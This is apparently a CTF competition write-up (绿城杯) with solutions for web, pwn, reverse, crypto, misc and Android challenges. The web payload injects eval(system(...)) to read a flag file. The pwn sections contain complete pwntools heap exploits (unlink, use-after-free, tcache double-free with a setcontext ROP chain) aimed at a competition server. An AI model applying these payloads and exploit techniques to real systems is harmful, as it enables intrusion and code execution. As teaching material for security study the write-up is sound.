绿城杯-WriteUp
VSole2021-09-30 06:44:41
Web
[warmup]ezphp
解题思路
git信息泄露
链接:https://pan.baidu.com/s/1vuw2ro56jZCtTBhW8N5e8g
提取码:1111
payload:?link_page=23%27)%20or%20eval(system("tac%20pages/flag.php"));%23
Pwn
null
解题思路
说是null 其实是off by one,基于uaf那题,这里直接试着打2.23,用的libc也是和uaf那题一样的
# -*- coding: utf-8 -*-
from pwn import *
elf=ELF('./1')
p=remote('82.157.5.28',51004)
libc=ELF('libc6_2.23-0ubuntu11.2_amd64.so')
context(arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])
context.log_level='debug'
def debug():
gdb.attach(p)
pause()
def add(idx,size,con):
p.recvuntil('Your choice :')
p.sendline('1')
p.recvuntil('Index:')
p.sendline(str(idx))
p.recvuntil('Size of Heap :')
p.sendline(str(size))
p.recvuntil('Content?:')
p.send(con)
def delete(idx):
p.recvuntil('Your choice :')
p.sendline('2')
p.recvuntil('Index:')
p.sendline(str(idx))
def edit(idx,con):
p.recvuntil('Your choice :')
p.sendline('3')
p.recvuntil('Index:')
p.sendline(str(idx))
p.recvuntil('Content?:')
p.send(con)
def show(idx):
p.recvuntil('Your choice :')
p.sendline('4')
p.recvuntil('Index :')
p.sendline(str(idx))
ptr=0x602120
add(0,0x48,'a')
add(1,0x80,'a')
add(2,0x80,'/bin/sh\x00')
fakechunk=p64(0)+p64(0x41)
fakechunk+=p64(ptr-0x18)+p64(ptr-0x10)
fakechunk+=0x20*'a'
fakechunk+=p64(0x40)+'\x90'
edit(0,fakechunk)
delete(1)
edit(0,0x18*'a'+p64(0x602120)+p64(0)+p64(elf.got['puts']))
show(2)
libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['puts']
print hex(libc.address)
pause()
edit(0,p64(libc.sym['__free_hook']))
edit(0,p64(libc.sym['system']))
add(3,0x20,'/bin/sh\x00')
delete(3)
p.interactive()
ezuaf
解题思路
远程doublefree泄漏cfree后三位,配合mallochook地址通过libcdatabase确定2.23,然后打og
# -*- coding: utf-8 -*-
from pwn import *
#p=process('./1')
p=remote('82.157.5.28',51602)
libc=ELF('libc6_2.23-0ubuntu11.2_amd64.so')
#p=process(['./1'],env={'LD_PRELOAD':'./libc-2.27_64.so'})
#libc=ELF('/glibc/2.23/64/lib/libc-2.23.so')
context(arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])
context.log_level='debug'
def debug():
gdb.attach(p)
pause()
def add(size):
p.recvuntil('>')
p.sendline('1')
p.recvuntil('size>')
p.sendline(str(size))
def delete(idx):
p.recvuntil('>')
p.sendline('2')
p.recvuntil('index>')
p.sendline(str(idx))
def edit(idx,con):
p.recvuntil('>')
p.sendline('3')
p.recvuntil('index>')
p.sendline(str(idx))
p.recvuntil('content>')
p.send(con)
def show(idx):
p.recvuntil('>')
p.sendline('4')
p.recvuntil('index>')
p.sendline(str(idx))
#p.recvuntil('0x')
#addr=int(p.recv(12),16)
add(0x100)
add(0x68)
delete(0)
show(0)
libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88-0x10-libc.sym['__malloc_hook']
#p.interactive()
print hex(libc.address)
delete(1)
edit(1,p64(libc.sym['__malloc_hook']-0x23))
add(0x68)
add(0x68)
og=[0x45226,0x4527a,0xf0364,0xf1207]
edit(3,'aaa'+p64(0)+p64(0)+p64(libc.address+og[0]))
add(0x10)
p.interactive()
W | GreentownNote | 解题做题人
题目说明
题目附件
解题思路
uaf
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
p = process('./GreentownNote')
libc = ELF("./libc-2.27.so")
p = remote("82.157.5.28", 51601)
def add(size, content="a"):
p.sendlineafter("Your choice :", "1")
p.sendlineafter("size :", str(size))
p.sendafter("Content :", content)
def show(idx):
p.sendlineafter("Your choice :", "2")
p.sendlineafter("ndex :", str(idx))
def free(idx):
p.sendlineafter("Your choice :", "3")
p.sendlineafter("ndex :", str(idx))
def exp():
add(0x3f0)#0
add(0x400)#1
add(0x3f0, (p64(0)+p64(0x21))*8)#2
free(0)
free(0)
free(0)
free(0)
show(0)
p.recvuntil("Content: ")
heap = u64(p.recv(6)+b"\x00"*2)
print(hex(heap))
add(0x3f0, p64(heap+0x3f0))#3
add(0x3f0)#4
add(0x3f0, p64(0)+p64(0x421))#5
free(1)
show(1)
p.recvuntil("Content: ")
libc.address = u64(p.recv(6)+b"\x00"*2)-0x7ffff7dcfca0+0x7ffff79e4000
print(hex(libc.address))
free(0)
free(0)
add(0x3f0, p64(libc.sym["__free_hook"]))
rop = [
libc.address+0x000000000002155f,
heap+0xb0,
libc.address+0x0000000000023e6a,
0,
libc.sym['open'],
libc.address+0x000000000002155f,
3,
libc.address+0x0000000000023e6a,
heap+0x100,
libc.address+0x0000000000001b96,
0x30,
libc.sym['read'],
libc.address+0x000000000002155f,
1,
libc.address+0x0000000000023e6a,
heap+0x100,
libc.address+0x0000000000001b96,
0x30,
libc.sym['write']
]
payload = flat(rop).ljust(0xa0, b"\x00")
payload += p64(heap+8)+p64(libc.address+0x000000000002155f)+b"flag"
add(0x3f0, payload)
add(0x3f0, p64(libc.sym["setcontext"]+53))
free(0)
#gdb.attach(p)
p.interactive()
if __name__ == '__main__':
exp()
'''
=> 0x7ffff7a360a5 : mov rsp,QWORD PTR [rdi+0xa0]
0x7ffff7a360ac : mov rbx,QWORD PTR [rdi+0x80]
0x7ffff7a360b3 : mov rbp,QWORD PTR [rdi+0x78]
0x7ffff7a360b7 : mov r12,QWORD PTR [rdi+0x48]
0x7ffff7a360bb : mov r13,QWORD PTR [rdi+0x50]
0x7ffff7a360bf : mov r14,QWORD PTR [rdi+0x58]
0x7ffff7a360c3 : mov r15,QWORD PTR [rdi+0x60]
0x7ffff7a360c7 : mov rcx,QWORD PTR [rdi+0xa8]
0x7ffff7a360ce : push rcx
0x7ffff7a360cf : mov rsi,QWORD PTR [rdi+0x70]
0x7ffff7a360d3 : mov rdx,QWORD PTR [rdi+0x88]
0x7ffff7a360da : mov rcx,QWORD PTR [rdi+0x98]
0x7ffff7a360e1 : mov r8,QWORD PTR [rdi+0x28]
0x7ffff7a360e5 : mov r9,QWORD PTR [rdi+0x30]
0x7ffff7a360e9 : mov rdi,QWORD PTR [rdi+0x68]
0x7ffff7a360ed : xor eax,eax
0x7ffff7a360ef : ret
'''
Reverse
抛石机
解题思路
最后是检查两个一元二次方程组,重点是程序将数字读取到了高8位,所以应该根据IEEE浮点标准进行变换,使符合要求
import cmath
import struct
from zio import *
def solve(a, b, c):
d = (b ** 2) - (4 * a * c)
sol1 = (-b - cmath.sqrt(d)) / (2 * a)
sol2 = (-b + cmath.sqrt(d)) / (2 * a)
d1 = (struct.pack(', sol1.real))
d2 = (struct.pack(', sol2.real))
ret = []
for v in [l32(d1[4:]), l32(d2[4:])]:
for i in range(2):
v1 = struct.unpack(', '\x00'*4 + l32(v+i))[0]
fin = b * v1 + v1 * a * v1 + c
if (fin > -0.00003) & (fin < 0.00003):
ret.append(v+i)
break
return ret[0], ret[1]
a1 = -27.6
b1 = 149.2
c1 = -129.0
a2 = -39.6
b2 = 59.2
c2 = 37.8
ret0, ret1 = solve(a1, b1, c1)
ret2, ret3 = solve(a2, b2, c2)
s = [hex(ret1), hex(ret0), hex(ret3), hex(ret2)]
print(s)
之后修改端序 得到flag为flag{454af13f-f84c-1140-1ee4-debf58a4ff3f}
[warmup]easy_re
解题思路
RC4,直接找到异或的数据和比较数据,下断点
写异或脚本直接得到flag
#include
int main()
{
int s1[] = {0x93,0xe0,0xec,0x83,0xe4,0xc6,0x1d,0x0,0x0,0x92,0xde,0xb5,0x12,0x84,0xf7,0x2d,0x56,0xb1,0x47,0xe2,0x69,0xb4,0x8a,0x95
,0xba,0x72,0x62,0x8,0x93,0xf9,0xcc,0x2d,0xa9,0xe2,0xd0,0x65,0x4b,0x78,0x68,0x24,0xd7,0x91,0x6};
int s2[] = {0xF5,0x8C,0x8D,0xE4,0x9F,0xA5,0x28,0x65,0x30,0xF4,0xEB,0xD3,0x24,0xA9,0x91,0x1A
,0x6F,0xD4,0x6A,0xD7,0x0B,0x8D,0xE8,0xB8,0x83,0x4A,0x5A,0x6E,0xBE,0xCB,0xF4,0x4B,0x99,0xD6,0xE6,0x54,0x7A,0x4F,0x50,0x14,0xE5,0xEC,0x8B};
for(int i=0;s2[i];i++)
printf("%c",s1[i]^s2[i]);
return 0;
}
//flag{c5e0f5f6-f79e-5b9b-988f-28f046117802}
easy_vxworks
解题思路
IDA打开,搜索字符串找到主函数,去除花指令
sub_2450虽然长,但是可以推测出是找到指向第i个元素的指针,长度为一定字节
加密逻辑位于sub_330
int __cdecl sub_330(unsigned int a1, int a2)
{
char v3; // [esp+0h] [ebp-14h]
char v4; // [esp+0h] [ebp-14h]
_BYTE *v5; // [esp+4h] [ebp-10h]
_BYTE *v6; // [esp+8h] [ebp-Ch]
if ( !a2 )
return 1;
v6 = (_BYTE *)sub_2450((int)"C:/WindRiver/workspace/helloworld/helloworld.c", 10, a1, 0, 1, v3);
*v6 ^= 0x22u;
v5 = (_BYTE *)sub_2450((int)"C:/WindRiver/workspace/helloworld/helloworld.c", 11, a1, 0, 1, v4);
*v5 += 3;
return sub_330(a1, a2 - 1);
}
但是传入的v4参数不知道,可以穷举
c=[188,10,187,193,213,134,127,10,201,185,81,78,136,10,130,185,49,141,10,253,201,199,127,185,17,78,185,232,141,87]
t=30
def decrypt(c,t):
for i in range(len(c)):
for j in range(t):
c[i]-=3
c[i]=c[i]+0x100&0xff
c[i]^=0x22
# print(bytes(c))
for t in range(1024):
d=[i for i in c]
decrypt(d,t)
j=0
while j if d[j]<32 or d[j]>128:
break
j+=1
if j==len(d):print(bytes(d))
# print(t)
flag{helo_w0rld_W3lcome_70_R3}
Crypto
RSA-1
解题思路
import gmpy2
import libnum
n = 17365231154926348364478276872558492775911760603002394353723603461898405740234715001820111548600914907617003806652492391686710256274156677887101997175692277729648456087534987616743724646598234466094779540729413583826355145277980479040157075453694250572316638348121571218759769533738721506811175866990851972838466307594226293836934116659685215775643285465895317755892754473332034234495795936183610569571016400535362762699517686781602302045048532131426035260878979892169441059467623523060569285570577199236309888155833013721997933960457784653262076135561769838704166810384309655788983073376941843467117256002645962737847
c = 6944967108815437735428941286784119403138319713455732155925055928646536962597672941805831312130689338014913452081296400272862710447207265099750401657828165836013122848656839100854719965188680097375491193249127725599660383746827031803066026497989298856420216250206035068180963797454792151191071433645946245914916732637007117085199442894495667455544517483404006536607121480678688000420422281380539368519807162175099763891988648117937777951069899975260190018995834904541447562718307433906592021226666885638877020304005614450763081337082838608414756162253825697420493509914578546951634127502393647068722995363753321912676
p = gmpy2.gcd(n, c)
q = n // p
e = 65537
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
M = pow(c, d, n)
m = M // 2021 // 1001 // p
print(libnum.n2s(m))
# flag{Math_1s_1nterest1ng_hah}
[warmup]加密算法
解题思路
直接把码表加密,之后按位找就行了
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
def encode(flag, a, b, m):
cipher_text = ''
for i in flag:
if i in str1:
addr = str1.find(i)
cipher_text += str1[(a * addr + b) % m]
else:
cipher_text += i
print(cipher_text)
return cipher_text
dec_charset = encode(str1,37,23,52)
cipher_text = 'aoxL{XaaHKP_tHgwpc_hN_ToXnnht}'
flag = ""
for i in cipher_text:
if i in str1:
addr = dec_charset.find(i)
flag += str1[addr]
else:
flag += i
print(flag)
# flag{AffInE_CIpheR_iS_clAssiC}
RSA2-PLUS
解题思路
https://jsur.in/post/2019-07-01-isitdtu-2019-quals-ctf-writeups
n1 = 6348779979606280884589422188738902470575876294643492831465947360363568026280963989291591157710389629216109615274754718329987990551836115660879103234129921943824061416396264358110216047994331119920503431491509529604742468032906950984256964560405062345280120526771439940278606226153077959057882262745273394986607004406770035459301695806378598890589432538916219821477777021460189140081521779103226953544426441823244765828342973086422949017937701261348963541035128661464068769033772390320426795044617751909787914185985911277628404632533530390761257251552073493697518547350246993679844132297414094727147161169548160586911
c1 = 6201882078995455673376327652982610102807874783073703018551044780440620679217833227711395689114659144506630609087600915116940111002026241056808189658969089532597757995423694966667948250438579639890580690392400661711864264184444018345499567505424672090632235109624193289954785503512742400960515331371813467034511130432319427185134018830006918682733848618201088649690422818940385123599468595766345668931882249779415788129316594083269412221804774856038796248038700275509397599351533280014908894068141056694660319816046357462684688942519849441237878018480036145051967731081582598773076490918572392784684372694103015244826
e = 0x10001
#p2+q2 = 274773146761138462708137582309097386437793891793691383033856524303010811294101933454824485010521468914846151819876043508541879637544444256520741418495479393777132830985856522008561088410862815913292288683761657919121930016956916865849261153721097671315883469348972925757078089715102032241818526925988645578778
#q2*q2 = 18514724270030962172566965941723224386374076294232652258701085781018776172843355920566035157331579524980108190739141959926523082142273672741849552475156278397131571360099018592018959785627785130126477982765210498547680367230723634424036009539347854344573537848628061468892166199866227984167843139793429682559241317072979374002912607549039431398267184818771503468116379618249319324788996321340764624593443106354104274472601170229835219638093242557547840060892527576940077162990069687019966946826210112318408269749294366586682732614372434218768720577917368726530200897558912687470088583774711767599580037663378929000217
n2 = 40588227045595304080360385041082238507044292731344465815296032905633525556943787610712651675460810768762763493579129831271018141591546207557410817432455139315527674932933085299277599173971912445226532235814580879585317211349524406424200622675880992390782025158621241499693400288031658194434641718026910652327933253877313106112861283314274635124734817398465059373562194694957841264834312640926278890386089611103714990646541470577351599526904458342660444968591197606820361364761648205241041444681145820799054413179462285509661124362074093583494932706249461954240408827087015525507173082129412234486228092002841868365895837463699200959915782767657258729794037776401995309244941171415842403617486719492483671490834562579225506831496881542530519595438932482796867853234159664409420977526102480385193101883785161080269573707156626838551506024455480650224305894501968583442346807126920740779780593650871645915149689424292912611578291912721896864772950410266629045542480009266574096080138709683466489568290569363478444349563498507530805502511051165160827192795520182720802422213364247355775222858214648603034743679187470844212529134374975737510982287957316878179964602394749601431823167982157434890459245394370728942790117156485268116758052636794417268680901420193002289035538753620555488506926366624641291881353268617130968991258983002165300186971963661666476600998389048880565199317280428349802824448329898502788492233381873026217202981921654673840142095839603360666049476100561268336225902504932800605464136192275593886736746497955270280541423593
c2 = 25591090168544821761746024178724660839590948190451329227481168576490717242294520739865602061082558759751196452117720647426598261568572440942370039702932821941366792140173428488344932203576334292648255551171274828821657097667106792872200082579319963310503721435500623146012954474613150848083425126987554594651797477741828655238243550266972216752593788734836373144363217639612492397228808215205862281278774096317615918854403992620720969173788151215489908812749179861803144937169587452008097008940710091361183942268245271154461872102813602754439939747566507116519362821255724179093051041994730856401493996771276172343313045755916751082693149885922105491818225012844519264933137622929024918619477538521533548551789739698933067212305578480416163609137189891797209277557411169643568540392303036719952140554435338851671440952865151077383220305295001632816442144022437763089133141886924265774247290306669825085862351732336395617276100374237159580759999593028756939354840677333467281632435767033150052439262501059299035212928041546259933118564251119588970009016873855478556588250138969938599988198494567241172399453741709840486953189764289118312870580993115636710724139809708256360212728127786394411676427828431569046279687481368215137561500777480380501551616577832499521295655237360184159889151837766353116185320317774645294201044772828099074917077896631909654671612557207653830344897644115936322128351494551004652981550758791285434809816872381900401440743578104582305215488888563166054568802145921399726673752722820646807494657299104190123945675647
t1 = 79679231796035037354449627487236220201878797729093909877127396750043503300636464774059752126148617367251988043645511172901030621825575172979048675217345099706517900079260617448298874437193769061144201311929792287772928471712053565834702260975126852624433945451405258351557569670978748727663718174543709899747
t2 = 79679231796035037354449627487236220201878797729093909877127396750043503300636464774059752126148617367251988043645511172901030621825575172979048675217341753594180007984204016274224280609480494305040439035855109422239942522968468133274883986349646765947317076885918174299537297351936448296784166003890345486613
from gmpy2 import iroot
from Crypto.Util.number import isPrime
def quadratic(a, b, c):
try:
(d, _) = iroot(b*b - (4*a*c),2)
return ((-b-d)//(2*a), (-b+d)//(2*a))
except:
return 0
for (e, d) in ((e, d) for e in range(1, 5000) for d in range(1, 5000)):
q1 = quadratic(e, e*d+t1-t2, -d*t2)
if q1 != 0:
q1 = q1[1]
res = q1*q1*e + q1*(e*d+t1-t2)-d*t2
if res == 0 and isPrime(q1):
print(q1, e, d)
q = 7502883888097212950622788817096216502912511795977786941568063923158816805073284550069689733527712330353018568842826730967449095687927404679782394052855569
p1= t2//q
from gmpy2 import next_prime
from Crypto.Util.number import *
q1 = next_prime(q)
p = t1//q1
phi1 = (p-1)*(q-1)*(p1-1)*(q1-1)
d1 = inverse(e,phi1)
m1 = pow(c1,d1,n1)
print(long_to_bytes(m1))
#b'flag{Euler_funct1ons'
p2 = 156369362301683324125218204402965647844847700898336893807965993347521097936153209680438582412356886147490621941774361449543361003099855063903583735699989524930842868946568028125148569137321044967404135533563894823557903913169345053238064421472421305575401290009671355220416064671043038807885626965528792907041 q2 = 118403784459455138582919377906131738592946190895354489225890530955489713357948723774385902598164582767355529878101682058998518634444589192617157682795489868846289962039288493883412519273541770945888153150197763095564026103787571812611196732248676365740482179339301570536662025044058993433932899960459852671737 phi2 = (p2-1)*p2*(q2-1)*(q2)*q2 n2 = 40588227045595304080360385041082238507044292731344465815296032905633525556943787610712651675460810768762763493579129831271018141591546207557410817432455139315527674932933085299277599173971912445226532235814580879585317211349524406424200622675880992390782025158621241499693400288031658194434641718026910652327933253877313106112861283314274635124734817398465059373562194694957841264834312640926278890386089611103714990646541470577351599526904458342660444968591197606820361364761648205241041444681145820799054413179462285509661124362074093583494932706249461954240408827087015525507173082129412234486228092002841868365895837463699200959915782767657258729794037776401995309244941171415842403617486719492483671490834562579225506831496881542530519595438932482796867853234159664409420977526102480385193101883785161080269573707156626838551506024455480650224305894501968583442346807126920740779780593650871645915149689424292912611578291912721896864772950410266629045542480009266574096080138709683466489568290569363478444349563498507530805502511051165160827192795520182720802422213364247355775222858214648603034743679187470844212529134374975737510982287957316878179964602394749601431823167982157434890459245394370728942790117156485268116758052636794417268680901420193002289035538753620555488506926366624641291881353268617130968991258983002165300186971963661666476600998389048880565199317280428349802824448329898502788492233381873026217202981921654673840142095839603360666049476100561268336225902504932800605464136192275593886736746497955270280541423593 c2 = 25591090168544821761746024178724660839590948190451329227481168576490717242294520739865602061082558759751196452117720647426598261568572440942370039702932821941366792140173428488344932203576334292648255551171274828821657097667106792872200082579319963310503721435500623146012954474613150848083425126987554594651797477741828655238243550266972216752593788734836373144363217639612492397228808215205862281278774096317615918854403992620720969173788151215489908812749179861803144937169587452008097008940710091361183942268245271154461872102813602754439939747566507116519362821255724179093051041994730856401493996771276172343313045755916751082693149885922105491818225012844519264933137622929024918619477538521533548551789739698933067212305578480416163609137189891797209277557411169643568540392303036719952140554435338851671440952865151077383220305295001632816442144022437763089133141886924265774247290306669825085862351732336395617276100374237159580759999593028756939354840677333467281632435767033150052439262501059299035212928041546259933118564251119588970009016873855478556588250138969938599988198494567241172399453741709840486953189764289118312870580993115636710724139809708256360212728127786394411676427828431569046279687481368215137561500777480380501551616577832499521295655237360184159889151837766353116185320317774645294201044772828099074917077896631909654671612557207653830344897644115936322128351494551004652981550758791285434809816872381900401440743578104582305215488888563166054568802145921399726673752722820646807494657299104190123945675647 e = 0x10001 from Crypto.Util.number import * d2 = inverse(e,phi2) m2 = pow(c2,d2,n2) print(long_to_bytes(m2)) # b'_1s_very_interst1ng}'
Misc
[warmup]音频隐写
解题思路
下载下来后是个wav,直接拖到AU看频谱图
flag{f8fbb2c761821d3af23858f721cc140b}
创新方向
APP逆向-clockin
解题思路
将apk文件解包进行patch,将not admin patch为admin
之后再进行签名,安装运行得到flag为
1cd8a8623acf512ea7a96c5305f1be9f
VSole
网络安全专家